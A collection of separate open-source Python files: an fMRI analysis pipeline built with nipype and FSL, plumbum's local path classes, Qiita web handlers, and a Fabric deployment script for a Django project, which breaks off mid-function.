core.wait(time)
self.win.flip()
return False
else:
keys = event.waitKeys()
self.win.flip()
return keys[0]=='escape'
def displayInstructions(self):
"""Show instructions and wait for the user to be ready
The 2 deg line next to the instructions can be used as a rough rule-of-thumb calibration
Returns True if the user wishes to skip the practice session
"""
if not self.displayText(self._instructions1):
noPractice = self.displayText(self._instructions2)
else:
noPractice = True
return noPractice
|
|
#!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
============================
fMRI: OpenfMRI.org data, FSL
============================
A growing number of datasets are available on `OpenfMRI <http://openfmri.org>`_.
This script demonstrates how to use nipype to analyze a data set.
python fmri_openfmri.py --datasetdir ds107
"""
from nipype import config
config.enable_provenance()
from glob import glob
import os
import nipype.pipeline.engine as pe
import nipype.algorithms.modelgen as model
import nipype.algorithms.rapidart as ra
import nipype.interfaces.fsl as fsl
import nipype.interfaces.io as nio
import nipype.interfaces.utility as niu
from nipype.workflows.fmri.fsl import (create_featreg_preproc,
create_modelfit_workflow,
create_fixed_effects_flow,
create_reg_workflow)
fsl.FSLCommand.set_default_output_type('NIFTI_GZ')
def get_subjectinfo(subject_id, base_dir, task_id, model_id):
"""Get info for a given subject
Parameters
----------
subject_id : string
Subject identifier (e.g., sub001)
base_dir : string
Path to base directory of the dataset
task_id : int
Which task to process
model_id : int
Which model to process
Returns
-------
run_ids : list of ints
Run numbers
conds : list of str
Condition names
TR : float
Repetition time
"""
from glob import glob
import os
import numpy as np
condition_info = []
cond_file = os.path.join(base_dir, 'models', 'model%03d' % model_id,
'condition_key.txt')
with open(cond_file, 'rt') as fp:
for line in fp:
info = line.strip().split()
condition_info.append([info[0], info[1], ' '.join(info[2:])])
if len(condition_info) == 0:
raise ValueError('No condition info found in %s' % cond_file)
taskinfo = np.array(condition_info)
n_tasks = len(np.unique(taskinfo[:, 0]))
conds = []
run_ids = []
if task_id > n_tasks:
raise ValueError('Task id %d does not exist' % task_id)
for idx in range(n_tasks):
taskidx = np.where(taskinfo[:, 0] == 'task%03d' % (idx + 1))
conds.append([condition.replace(' ', '_') for condition
in taskinfo[taskidx[0], 2]])
files = glob(os.path.join(base_dir,
subject_id,
'BOLD',
'task%03d_run*' % (idx + 1)))
run_ids.insert(idx, range(1, len(files) + 1))
TR = np.genfromtxt(os.path.join(base_dir, 'scan_key.txt'))[1]
return run_ids[task_id - 1], conds[task_id - 1], TR
def analyze_openfmri_dataset(data_dir, subject=None, model_id=None,
task_id=None, output_dir=None):
"""Analyzes an open fmri dataset
Parameters
----------
data_dir : str
Path to the base data directory
work_dir : str
Nipype working directory (defaults to cwd)
"""
"""
Load nipype workflows
"""
preproc = create_featreg_preproc(whichvol='first')
modelfit = create_modelfit_workflow()
fixed_fx = create_fixed_effects_flow()
registration = create_reg_workflow()
"""
Remove the plotting connection so that plot iterables don't propagate
to the model stage
"""
preproc.disconnect(preproc.get_node('plot_motion'), 'out_file',
preproc.get_node('outputspec'), 'motion_plots')
"""
Set up openfmri data specific components
"""
subjects = [path.split(os.path.sep)[-1] for path in
glob(os.path.join(data_dir, 'sub*'))]
infosource = pe.Node(niu.IdentityInterface(fields=['subject_id',
'model_id',
'task_id']),
name='infosource')
if subject is None:
infosource.iterables = [('subject_id', subjects[:2]),
('model_id', [model_id]),
('task_id', [task_id])]
else:
infosource.iterables = [('subject_id',
[subjects[subjects.index(subject)]]),
('model_id', [model_id]),
('task_id', [task_id])]
subjinfo = pe.Node(niu.Function(input_names=['subject_id', 'base_dir',
'task_id', 'model_id'],
output_names=['run_id', 'conds', 'TR'],
function=get_subjectinfo),
name='subjectinfo')
subjinfo.inputs.base_dir = data_dir
"""
Return data components as anat, bold and behav
"""
datasource = pe.Node(nio.DataGrabber(infields=['subject_id', 'run_id',
'task_id', 'model_id'],
outfields=['anat', 'bold', 'behav',
'contrasts']),
name='datasource')
datasource.inputs.base_directory = data_dir
datasource.inputs.template = '*'
datasource.inputs.field_template = {'anat': '%s/anatomy/highres001.nii.gz',
'bold': '%s/BOLD/task%03d_r*/bold.nii.gz',
'behav': ('%s/model/model%03d/onsets/task%03d_'
'run%03d/cond*.txt'),
'contrasts': ('models/model%03d/'
'task_contrasts.txt')}
datasource.inputs.template_args = {'anat': [['subject_id']],
'bold': [['subject_id', 'task_id']],
'behav': [['subject_id', 'model_id',
'task_id', 'run_id']],
'contrasts': [['model_id']]}
datasource.inputs.sort_filelist = True
"""
Create meta workflow
"""
wf = pe.Workflow(name='openfmri')
wf.connect(infosource, 'subject_id', subjinfo, 'subject_id')
wf.connect(infosource, 'model_id', subjinfo, 'model_id')
wf.connect(infosource, 'task_id', subjinfo, 'task_id')
wf.connect(infosource, 'subject_id', datasource, 'subject_id')
wf.connect(infosource, 'model_id', datasource, 'model_id')
wf.connect(infosource, 'task_id', datasource, 'task_id')
wf.connect(subjinfo, 'run_id', datasource, 'run_id')
wf.connect([(datasource, preproc, [('bold', 'inputspec.func')]),
])
def get_highpass(TR, hpcutoff):
return hpcutoff / (2 * TR)
gethighpass = pe.Node(niu.Function(input_names=['TR', 'hpcutoff'],
output_names=['highpass'],
function=get_highpass),
name='gethighpass')
wf.connect(subjinfo, 'TR', gethighpass, 'TR')
wf.connect(gethighpass, 'highpass', preproc, 'inputspec.highpass')
"""
Setup a basic set of contrasts, a t-test per condition
"""
def get_contrasts(contrast_file, task_id, conds):
import numpy as np
contrast_def = np.genfromtxt(contrast_file, dtype=object)
contrasts = []
for row in contrast_def:
if row[0] != 'task%03d' % task_id:
continue
con = [row[1], 'T', ['cond%03d' % i for i in range(len(conds))],
row[2:].astype(float).tolist()]
contrasts.append(con)
return contrasts
contrastgen = pe.Node(niu.Function(input_names=['contrast_file',
'task_id', 'conds'],
output_names=['contrasts'],
function=get_contrasts),
name='contrastgen')
art = pe.MapNode(interface=ra.ArtifactDetect(use_differences=[True, False],
use_norm=True,
norm_threshold=1,
zintensity_threshold=3,
parameter_source='FSL',
mask_type='file'),
iterfield=['realigned_files', 'realignment_parameters',
'mask_file'],
name="art")
modelspec = pe.Node(interface=model.SpecifyModel(),
name="modelspec")
modelspec.inputs.input_units = 'secs'
wf.connect(subjinfo, 'TR', modelspec, 'time_repetition')
wf.connect(datasource, 'behav', modelspec, 'event_files')
wf.connect(subjinfo, 'TR', modelfit, 'inputspec.interscan_interval')
wf.connect(subjinfo, 'conds', contrastgen, 'conds')
wf.connect(datasource, 'contrasts', contrastgen, 'contrast_file')
wf.connect(infosource, 'task_id', contrastgen, 'task_id')
wf.connect(contrastgen, 'contrasts', modelfit, 'inputspec.contrasts')
wf.connect([(preproc, art, [('outputspec.motion_parameters',
'realignment_parameters'),
('outputspec.realigned_files',
'realigned_files'),
('outputspec.mask', 'mask_file')]),
(preproc, modelspec, [('outputspec.highpassed_files',
'functional_runs'),
('outputspec.motion_parameters',
'realignment_parameters')]),
(art, modelspec, [('outlier_files', 'outlier_files')]),
(modelspec, modelfit, [('session_info',
'inputspec.session_info')]),
(preproc, modelfit, [('outputspec.highpassed_files',
'inputspec.functional_data')])
])
"""
Reorder the copes so that now it combines across runs
"""
def sort_copes(files):
numelements = len(files[0])
outfiles = []
for i in range(numelements):
outfiles.insert(i, [])
for j, elements in enumerate(files):
outfiles[i].append(elements[i])
return outfiles
def num_copes(files):
return len(files)
pickfirst = lambda x: x[0]
wf.connect([(preproc, fixed_fx, [(('outputspec.mask', pickfirst),
'flameo.mask_file')]),
(modelfit, fixed_fx, [(('outputspec.copes', sort_copes),
'inputspec.copes'),
('outputspec.dof_file',
'inputspec.dof_files'),
(('outputspec.varcopes',
sort_copes),
'inputspec.varcopes'),
(('outputspec.copes', num_copes),
'l2model.num_copes'),
])
])
wf.connect(preproc, 'outputspec.mean', registration, 'inputspec.mean_image')
wf.connect(datasource, 'anat', registration, 'inputspec.anatomical_image')
registration.inputs.inputspec.target_image = fsl.Info.standard_image('MNI152_T1_2mm.nii.gz')
def merge_files(copes, varcopes):
out_files = []
splits = []
out_files.extend(copes)
splits.append(len(copes))
out_files.extend(varcopes)
splits.append(len(varcopes))
return out_files, splits
mergefunc = pe.Node(niu.Function(input_names=['copes', 'varcopes'],
output_names=['out_files', 'splits'],
function=merge_files),
name='merge_files')
wf.connect([(fixed_fx.get_node('outputspec'), mergefunc,
[('copes', 'copes'),
('varcopes', 'varcopes'),
])])
wf.connect(mergefunc, 'out_files', registration, 'inputspec.source_files')
def split_files(in_files, splits):
copes = in_files[:splits[1]]
varcopes = in_files[splits[1]:]
return copes, varcopes
splitfunc = pe.Node(niu.Function(input_names=['in_files', 'splits'],
output_names=['copes', 'varcopes'],
function=split_files),
name='split_files')
wf.connect(mergefunc, 'splits', splitfunc, 'splits')
wf.connect(registration, 'outputspec.transformed_files',
splitfunc, 'in_files')
"""
Connect to a datasink
"""
def get_subs(subject_id, conds, model_id, task_id):
subs = [('_subject_id_%s_' % subject_id, '')]
subs.append(('_model_id_%d' % model_id, 'model%03d' %model_id))
subs.append(('task_id_%d/' % task_id, '/task%03d_' % task_id))
subs.append(('bold_dtype_mcf_mask_smooth_mask_gms_tempfilt_mean_warp_warp',
'mean'))
for i in range(len(conds)):
subs.append(('_flameo%d/cope1.' % i, 'cope%02d.' % (i + 1)))
subs.append(('_flameo%d/varcope1.' % i, 'varcope%02d.' % (i + 1)))
subs.append(('_flameo%d/zstat1.' % i, 'zstat%02d.' % (i + 1)))
subs.append(('_flameo%d/tstat1.' % i, 'tstat%02d.' % (i + 1)))
subs.append(('_flameo%d/res4d.' % i, 'res4d%02d.' % (i + 1)))
subs.append(('_warpall%d/cope1_warp_warp.' % i,
'cope%02d.' % (i + 1)))
subs.append(('_warpall%d/varcope1_warp_warp.' % (len(conds) + i),
'varcope%02d.' % (i + 1)))
return subs
subsgen = pe.Node(niu.Function(input_names=['subject_id', 'conds',
'model_id', 'task_id'],
output_names=['substitutions'],
function=get_subs),
name='subsgen')
datasink = pe.Node(interface=nio.DataSink(),
name="datasink")
wf.connect(infosource, 'subject_id', datasink, 'container')
wf.connect(infosource, 'subject_id', subsgen, 'subject_id')
wf.connect(infosource, 'model_id', subsgen, 'model_id')
wf.connect(infosource, 'task_id', subsgen, 'task_id')
wf.connect(contrastgen, 'contrasts', subsgen, 'conds')
wf.connect(subsgen, 'substitutions', datasink, 'substitutions')
wf.connect([(fixed_fx.get_node('outputspec'), datasink,
[('res4d', 'res4d'),
('copes', 'copes'),
('varcopes', 'varcopes'),
('zstats', 'zstats'),
('tstats', 'tstats')])
])
wf.connect([(splitfunc, datasink,
[('copes', 'copes.mni'),
('varcopes', 'varcopes.mni'),
])])
wf.connect(registration, 'outputspec.transformed_mean', datasink, 'mean.mni')
"""
Set processing parameters
"""
hpcutoff = 120.
preproc.inputs.inputspec.fwhm = 6.0
gethighpass.inputs.hpcutoff = hpcutoff
modelspec.inputs.high_pass_filter_cutoff = hpcutoff
modelfit.inputs.inputspec.bases = {'dgamma': {'derivs': True}}
modelfit.inputs.inputspec.model_serial_correlations = True
modelfit.inputs.inputspec.film_threshold = 1000
datasink.inputs.base_directory = output_dir
return wf
if __name__ == '__main__':
import argparse
defstr = ' (default %(default)s)'
parser = argparse.ArgumentParser(prog='fmri_openfmri.py',
description=__doc__)
parser.add_argument('-d', '--datasetdir', required=True)
parser.add_argument('-s', '--subject', default=None,
help="Subject name (e.g. 'sub001')")
parser.add_argument('-m', '--model', default=1,
help="Model index" + defstr)
parser.add_argument('-t', '--task', default=1,
help="Task index" + defstr)
parser.add_argument("-o", "--output_dir", dest="outdir",
help="Output directory base")
parser.add_argument("-w", "--work_dir", dest="work_dir",
help="Output directory base")
parser.add_argument("-p", "--plugin", dest="plugin",
default='Linear',
help="Plugin to use")
parser.add_argument("--plugin_args", dest="plugin_args",
help="Plugin arguments")
args = parser.parse_args()
outdir = args.outdir
work_dir = os.getcwd()
if args.work_dir:
work_dir = os.path.abspath(args.work_dir)
if outdir:
outdir = os.path.abspath(outdir)
else:
outdir = os.path.join(work_dir, 'output')
outdir = os.path.join(outdir, 'model%02d' % int(args.model),
'task%03d' % int(args.task))
wf = analyze_openfmri_dataset(data_dir=os.path.abspath(args.datasetdir),
subject=args.subject,
model_id=int(args.model),
task_id=int(args.task),
output_dir=outdir)
wf.base_dir = work_dir
if args.plugin_args:
wf.run(args.plugin, plugin_args=eval(args.plugin_args))
else:
wf.run(args.plugin)
|
|
from __future__ import with_statement
import os
import sys
import glob
import shutil
import errno
import logging
from contextlib import contextmanager
from plumbum.lib import _setdoc, IS_WIN32
from plumbum.path.base import Path, FSUser
from plumbum.path.remote import RemotePath
try:
from pwd import getpwuid, getpwnam
from grp import getgrgid, getgrnam
except ImportError:
def getpwuid(x):
return (None,)
def getgrgid(x):
return (None,)
def getpwnam(x):
raise OSError("`getpwnam` not supported")
def getgrnam(x):
raise OSError("`getgrnam` not supported")
logger = logging.getLogger("plumbum.local")
#===================================================================================================
# Local Paths
#===================================================================================================
class LocalPath(Path):
"""The class implementing local-machine paths"""
__slots__ = ["_path"]
CASE_SENSITIVE = not IS_WIN32
def __init__(self, *parts):
if not parts:
raise TypeError("At least one path part is require (none given)")
if any(isinstance(path, RemotePath) for path in parts):
raise TypeError("LocalPath cannot be constructed from %r" % (parts,))
self._path = os.path.normpath(os.path.join(*(str(p) for p in parts)))
def __new__(cls, *parts):
if len(parts) == 1 and \
isinstance(parts[0], cls) and \
not isinstance(parts[0], LocalWorkdir):
return parts[0]
return object.__new__(cls)
def __str__(self):
return self._path
def _get_info(self):
return self._path
def __getstate__(self):
return {"_path" : self._path}
def _form(self, *parts):
return LocalPath(*parts)
@property
@_setdoc(Path)
def basename(self):
return os.path.basename(str(self))
@property
@_setdoc(Path)
def dirname(self):
return LocalPath(os.path.dirname(str(self)))
@property
@_setdoc(Path)
def uid(self):
uid = self.stat().st_uid
name = getpwuid(uid)[0]
return FSUser(uid, name)
@property
@_setdoc(Path)
def gid(self):
gid = self.stat().st_gid
name = getgrgid(gid)[0]
return FSUser(gid, name)
@_setdoc(Path)
def join(self, *others):
return LocalPath(self, *others)
@_setdoc(Path)
def list(self):
return [self / fn for fn in os.listdir(str(self))]
@_setdoc(Path)
def isdir(self):
return os.path.isdir(str(self))
@_setdoc(Path)
def isfile(self):
return os.path.isfile(str(self))
@_setdoc(Path)
def islink(self):
return os.path.islink(str(self))
@_setdoc(Path)
def exists(self):
return os.path.exists(str(self))
@_setdoc(Path)
def stat(self):
return os.stat(str(self))
@_setdoc(Path)
def glob(self, pattern):
return [LocalPath(fn) for fn in glob.glob(str(self / pattern))]
@_setdoc(Path)
def delete(self):
if not self.exists():
return
if self.isdir():
shutil.rmtree(str(self))
else:
try:
os.remove(str(self))
except OSError:
# file might already been removed (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.ENOENT:
raise
@_setdoc(Path)
def move(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot move local path %s to %r" % (self, dst))
shutil.move(str(self), str(dst))
return LocalPath(dst)
@_setdoc(Path)
def copy(self, dst, override = False):
if isinstance(dst, RemotePath):
raise TypeError("Cannot copy local path %s to %r" % (self, dst))
dst = LocalPath(dst)
if override:
dst.delete()
if self.isdir():
shutil.copytree(str(self), str(dst))
else:
dst_dir = LocalPath(dst).dirname
if not dst_dir.exists():
dst_dir.mkdir()
shutil.copy2(str(self), str(dst))
return dst
@_setdoc(Path)
def mkdir(self):
if not self.exists():
try:
os.makedirs(str(self))
except OSError:
# directory might already exist (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.EEXIST:
raise
@_setdoc(Path)
def open(self, mode = "rb"):
return open(str(self), mode)
@_setdoc(Path)
def read(self, encoding=None):
with self.open("rb") as f:
data = f.read()
if encoding:
data = data.decode(encoding)
return data
@_setdoc(Path)
def write(self, data, encoding=None):
if encoding:
data = data.encode(encoding)
with self.open("wb") as f:
f.write(data)
@_setdoc(Path)
def chown(self, owner = None, group = None, recursive = None):
if not hasattr(os, "chown"):
raise OSError("os.chown() not supported")
uid = self.uid if owner is None else (owner if isinstance(owner, int) else getpwnam(owner)[2])
gid = self.gid if group is None else (group if isinstance(group, int) else getgrnam(group)[2])
os.chown(str(self), uid, gid)
if recursive or (recursive is None and self.isdir()):
for subpath in self.walk():
os.chown(str(subpath), uid, gid)
@_setdoc(Path)
def chmod(self, mode):
if not hasattr(os, "chmod"):
raise OSError("os.chmod() not supported")
os.chmod(str(self), mode)
@_setdoc(Path)
def access(self, mode = 0):
return os.access(str(self), self._access_mode_to_flags(mode))
@_setdoc(Path)
def link(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot create a hardlink from local path %s to %r" % (self, dst))
if hasattr(os, "link"):
os.link(str(self), str(dst))
else:
from plumbum.machines.local import local
# windows: use mklink
if self.isdir():
local["cmd"]("/C", "mklink", "/D", "/H", str(dst), str(self))
else:
local["cmd"]("/C", "mklink", "/H", str(dst), str(self))
@_setdoc(Path)
def symlink(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot create a symlink from local path %s to %r" % (self, dst))
if hasattr(os, "symlink"):
os.symlink(str(self), str(dst))
else:
from plumbum.machines.local import local
# windows: use mklink
if self.isdir():
local["cmd"]("/C", "mklink", "/D", str(dst), str(self))
else:
local["cmd"]("/C", "mklink", str(dst), str(self))
@_setdoc(Path)
def unlink(self):
try:
os.unlink(str(self))
except OSError:
# file might already been removed (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.ENOENT:
raise
class LocalWorkdir(LocalPath):
"""Working directory manipulator"""
__slots__ = []
def __init__(self):
LocalPath.__init__(self, os.getcwd())
def __hash__(self):
raise TypeError("unhashable type")
def __new__(cls):
return object.__new__(cls)
def chdir(self, newdir):
"""Changes the current working directory to the given one
:param newdir: The destination director (a string or a ``LocalPath``)
"""
if isinstance(newdir, RemotePath):
raise TypeError("newdir cannot be %r" % (newdir,))
logger.debug("Chdir to %s", newdir)
os.chdir(str(newdir))
self._path = os.path.normpath(os.getcwd())
def getpath(self):
"""Returns the current working directory as a ``LocalPath`` object"""
return LocalPath(self._path)
@contextmanager
def __call__(self, newdir):
"""A context manager used to ``chdir`` into a directory and then ``chdir`` back to
the previous location; much like ``pushd``/``popd``.
:param newdir: The destination director (a string or a ``LocalPath``)
"""
prev = self._path
self.chdir(newdir)
try:
yield
finally:
self.chdir(prev)
|
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from json import loads
from tornado.web import authenticated
from qiita_core.util import execute_as_transaction
from qiita_core.qiita_settings import qiita_config, r_client
from qiita_pet.handlers.base_handlers import BaseHandler
from qiita_pet.handlers.analysis_handlers import check_analysis_access
from qiita_pet.handlers.util import to_int
from qiita_pet.util import get_network_nodes_edges
from qiita_db.analysis import Analysis
from qiita_db.artifact import Artifact
class CreateAnalysisHandler(BaseHandler):
@authenticated
def post(self):
name = self.get_argument('name')
desc = self.get_argument('description')
mdsi = self.get_argument('merge_duplicated_sample_ids', False)
if mdsi in (b'on', 'on'):
mdsi = True
analysis = Analysis.create(
self.current_user, name, desc, merge_duplicated_sample_ids=mdsi,
from_default=True)
self.redirect(u"%s/analysis/description/%s/"
% (qiita_config.portal_dir, analysis.id))
def analysis_description_handler_get_request(analysis_id, user):
"""Returns the analysis information
Parameters
----------
analysis_id : int
The analysis id
user : qiita_db.user.User
The user performing the request
"""
analysis = Analysis(analysis_id)
check_analysis_access(user, analysis)
job_info = r_client.get("analysis_%s" % analysis.id)
alert_type = 'info'
alert_msg = ''
if job_info:
job_info = loads(job_info)
job_id = job_info['job_id']
if job_id:
r_payload = r_client.get(job_id)
if r_payload:
redis_info = loads(r_client.get(job_id))
if redis_info['status_msg'] == 'running':
alert_msg = ('An artifact is being deleted from this '
'analysis')
elif redis_info['return'] is not None:
alert_type = redis_info['return']['status']
alert_msg = redis_info['return']['message'].replace(
'\n', '</br>')
artifacts = {}
for aid, samples in analysis.samples.items():
artifact = Artifact(aid)
study = artifact.study
artifacts[aid] = (
study.id, study.title, artifact.merging_scheme, samples)
return {'analysis_name': analysis.name,
'analysis_id': analysis.id,
'analysis_is_public': analysis.is_public,
'analysis_description': analysis.description,
'analysis_mapping_id': analysis.mapping_file,
'alert_type': alert_type,
'artifacts': artifacts,
'alert_msg': alert_msg}
class AnalysisDescriptionHandler(BaseHandler):
@authenticated
@execute_as_transaction
def get(self, analysis_id):
res = analysis_description_handler_get_request(analysis_id,
self.current_user)
self.render("analysis_description.html", **res)
@authenticated
@execute_as_transaction
def post(self, analysis_id):
analysis = Analysis(analysis_id)
check_analysis_access(self.current_user, analysis)
message = ''
try:
Analysis(analysis_id).make_public()
except Exception as e:
message = str(e)
res = analysis_description_handler_get_request(
analysis_id, self.current_user)
if message:
# this will display the error message in the main banner
res['level'] = 'danger'
res['message'] = message
self.render("analysis_description.html", **res)
def analyisis_graph_handler_get_request(analysis_id, user):
"""Returns the graph information of the analysis
Parameters
----------
analysis_id : int
The analysis id
user : qiita_db.user.User
The user performing the request
Returns
-------
dict with the graph information
Raises
------
ValueError
If there is more than one workflow in a single analysis
"""
analysis = Analysis(analysis_id)
# Check if the user actually has access to the analysis
check_analysis_access(user, analysis)
# A user has full access to the analysis if it is one of its private
# analyses, the analysis has been shared with the user or the user is a
# superuser or admin
full_access = (analysis in (user.private_analyses | user.shared_analyses)
or user.level in {'superuser', 'admin'})
nodes = []
edges = []
artifacts_being_deleted = []
wf_id = None
# Loop through all the initial artifacts of the analysis
for a in analysis.artifacts:
if a.processing_parameters is None:
g = a.descendants_with_jobs
nodes, edges, a_wf_id = get_network_nodes_edges(
g, full_access, nodes=nodes, edges=edges)
# nodes returns [node_type, node_name, element_id]; here we
# are looking for the node_type == artifact, and check by
# the element/artifact_id if it's being deleted
for a in nodes:
if (a[0] == 'artifact' and
Artifact(a[2]).being_deleted_by is not None):
artifacts_being_deleted.append(a[2])
if wf_id is None:
wf_id = a_wf_id
elif a_wf_id is not None and wf_id != a_wf_id:
# This should never happen, but worth having a useful message
raise ValueError('More than one workflow in a single analysis')
return {'edges': edges, 'nodes': nodes, 'workflow': wf_id,
'artifacts_being_deleted': artifacts_being_deleted}
class AnalysisGraphHandler(BaseHandler):
@authenticated
@execute_as_transaction
def get(self, analysis_id):
analysis_id = to_int(analysis_id)
response = analyisis_graph_handler_get_request(
analysis_id, self.current_user)
self.write(response)
def analyisis_job_handler_get_request(analysis_id, user):
"""Returns the job information of the analysis
Parameters
----------
analysis_id: int
The analysis id
user : qiita_db.user.User
The user performing the request
Returns
-------
dict with the jobs information
"""
analysis = Analysis(analysis_id)
# Check if the user actually has access to the analysis
check_analysis_access(user, analysis)
return {
j.id: {'status': j.status, 'step': j.step,
'error': j.log.msg if j.log else ""}
for j in analysis.jobs}
class AnalysisJobsHandler(BaseHandler):
@authenticated
@execute_as_transaction
def get(self, analysis_id):
analysis_id = to_int(analysis_id)
response = analyisis_job_handler_get_request(
analysis_id, self.current_user)
self.write(response)
|
|
# -*- coding: utf-8 -*-
from fabric.api import cd, env, require, run, task
from fabric.colors import green, white
from fabric.context_managers import contextmanager, prefix, shell_env
from fabric.operations import put
from fabric.utils import puts
from fabutils import arguments, join, options
from fabutils.context import cmd_msg
from fabutils.env import set_env_from_json_file
from fabutils.tasks import ulocal, ursync_project, urun
from fabutils.text import SUCCESS_ART
@contextmanager
def virtualenv():
"""Activate virtualenv.
Activates the virtualenv in which the commands shall be run.
"""
require('site_dir', 'django_settings')
with cd(env.site_dir):
with shell_env(DJANGO_SETTINGS_MODULE=env.django_settings):
yield
@task
def environment(env_name):
"""Creates environment.
Creates a dynamic environment based on the contents of the given
environments_file.
Args:
env_name(str): Name environment.
"""
if env_name == 'vagrant':
result = ulocal('vagrant ssh-config | grep IdentityFile', capture=True)
env.key_filename = result.split()[1].replace('"', '')
set_env_from_json_file('environments.json', env_name)
@task
def startapp(app_name):
"""Create new app
Create a new app inside the Django project.
Args:
app_name(str): Name of new app inside project.
Usage:
>>> fab environment:vagrant start_app:'app_name'.
"""
with virtualenv():
run(join('python manage.py startapp', app_name))
@task
def load_mandatory_dummy_data(*args):
"""
Loads the dummy data for developing.
"""
@task
def load_dummy_data(*args):
"""
Loads the dummy data for developing.
"""
loaddata(
'areas.json',
'categories.json',
'subjects.json',
'dummy_superuser.json',
'posts.json',
)
@task
def createsuperuser():
"""Create superuser.
Create a superuser to use in the Django application.
Usage:
>>> fab environment:vagrant createsuperuser.
"""
with virtualenv():
run('python manage.py createsuperuser')
@task
def createdb():
"""New database.
Creates a new database instance with utf-8 encoding for the project.
Usage:
>>>fab environment:vagrant createdb.
"""
urun('createdb knowledge_base -l en_US.UTF-8 -E UTF8 -T template0')
@task
def resetdb():
"""Restore database.
Reset the project's database by dropping an creating it again.
Usage:
>>>fab environment:vagrant resetdb.
"""
urun('dropdb knowledge_base')
createdb()
migrate()
load_dummy_data()
@task
def bootstrap():
"""Builds the environment to start the project.
Create database, apply migrations and collect the static files.
Usage:
>>>fab environment:vagrant bootstrap.
"""
# Build the DB schema and collect the static files.
createdb()
migrate()
load_dummy_data()
collectstatic()
@task
def loaddata(*args):
"""Loads the given data fixtures into the project's database.
Args:
args(str): Name fixture.
Usage:
>>>fab environment:vagrant loaddata:'fixture'.
"""
with virtualenv():
run(join('python manage.py loaddata', arguments(*args)))
@task
def makemigrations(*args, **kwargs):
"""Creates the new migrations based on the project's models changes.
Creating new migrations based on the changes you have made to your models.
Args:
args (Optional[str]): Create migration for app_name.
Example:
fab environment:vagrant makemigrations.
"""
with virtualenv():
run(join('python manage.py makemigrations',
options(**kwargs), arguments(*args)))
@task
def migrate(*args, **kwargs):
"""Apply migrations.
Syncs the DB and applies the available migrations.
Args:
args (Optional[str]): Specified apps has its migrations.
kwargs (Optional[str]): Brings the database schema to state where the
named migration is applied (migrate_name).
Example:
>>>fab environment:vagrant migrate.
"""
with virtualenv():
run(join('python manage.py migrate',
options(**kwargs), arguments(*args)))
@task
def collectstatic():
"""Collects the static files.
Usage:
>>> fab environment:vagrant collectstatic.
"""
with virtualenv():
run('python manage.py collectstatic --noinput')
@task
def runserver():
"""Run project.
Starts the development server inside the Vagrant VM.
Usage:
>>>fab environment:vagrant runserver.
"""
with virtualenv():
run('python manage.py runserver_plus')
@contextmanager
def node():
"""
Activates the node version in which the commands shall be run.
"""
with cd(env.site_dir):
with prefix('nvm use stable'), shell_env(CI='true'):
yield
@task
def bower_install(*args, **kwargs):
"""
Installs frontend dependencies with bower.
"""
with node():
run(join('bower install',
options(**kwargs), arguments(*args)))
@task
def npm_install():
"""
Installs the nodejs dependencies defined in package.json
"""
with node():
run('npm install')
@task
def deploy(git_ref, upgrade=False):
"""Deploy project.
Deploy the code of the given git reference to the previously selected
environment.
Args:
upgrade(Optional[bool]):
Pass ``upgrade=True`` to upgrade the versions of the already
installed project requirements (with pip)
git_ref(str): name branch you make deploy.
Example:
>>>fab environment:vagrant deploy:devel.
"""
require('hosts', 'user', 'group', 'site_dir', 'django_settings')
# Retrives git reference metadata and creates a temp directory with the
# contents resulting of applying a ``git archive`` command.
message = white('Creating git archive from {0}'.format(git_ref), bold=True)
with cmd_msg(message):
repo = ulocal(
'basename `git rev-parse --show-toplevel`', capture=True)
commit = ulocal(
'git rev-parse --short {0}'.format(git_ref), capture=True)
branch = ulocal(
'git rev-parse --abbrev-ref HEAD', capture=True)
tmp_dir = '/tmp/blob-{0}-{1}/'.format(repo, commit)
ulocal('rm -fr {0}'.format(tmp_dir))
ulocal('mkdir {0}'.format(tmp_dir))
ulocal('git archive {0} ./src | tar -xC {1} --strip 1'.format(
commit, tmp_dir))
# Uploads the code of the temp directory to the host with rsync telling
# that it must delete old files in the server, upload deltas by checking
# file checksums recursivelly in a zipped way; changing the file
# permissions to allow read, write and execution to the owner, read and
# execution to the group and no permissions for any other user.
with cmd_msg(white('Uploading code to server...', bold=True)):
ursync_project(
local_dir=tmp_dir,
remote_dir=env.site_dir,
delete=True,
default_opts='-chrtvzP',
extra_opts='--chmod=750',
exclude=["*.pyc", "env/", "cover/"]
)
# Performs the deployment task, i.e. Install/upgrade project
# requirements, syncronize and migrate the database changes, collect
# static files, reload the webserver, etc.
message = white('Running deployment tasks', bold=True)
with cmd_msg(message, grouped=True):
with virtualenv():
message = white('Installing Python requirements with pip')
with cmd_msg(message, spaces=2):
run('pip install -{0}r ./requirements/production.txt'.format(
'U' if upgrade else ''))
message = white('Migrating database')
with cmd_msg(message, spaces=2):
run('python manage.py migrate --noinput')
message = 'Installing node modules'
with cmd_msg(message, spaces=2):
npm_install()
message = 'Installing bower components'
with cmd_msg(message, spaces=2):
bower_install()
message = white('Collecting static files')
with cmd_msg(message, spaces=2):
run('python manage.py collectstatic --noinput')
message = white('Setting file permissions')
with cmd_msg(message, spaces=2):
run('chgrp -R {0} .'.format(env.group))
run('chgrp -R {0} ../media'.format(env.group))
message = white('Restarting webserver')
with cmd_msg(message, spaces=2):
run('touch ../reload')
message = white('Registering deployment')
with cmd_msg(message, spaces=2):
register_deployment(commit, branch)
# Clean the temporary snapshot files that was just deployed to the host
message = white('Cleaning up...', bold=True)
with cmd_msg(message):
ulocal('rm -fr {0}'.format(tmp_dir))
puts(green(SUCCESS_ART), show_prefix=False)
puts(white('Code from {0} was succesfully deployed to host {1}'.format(
git_ref, ', '.join(env.hosts)), bold=True), show_prefix=False)
@task
def register_deployment(commit, branch):
"""Register deployment.
Register the current deployment at Opbeat with given commit and branch.
Args:
commit(str): This is last commit project.
branch(str): Name branch.
"""
with virtualenv():
run(
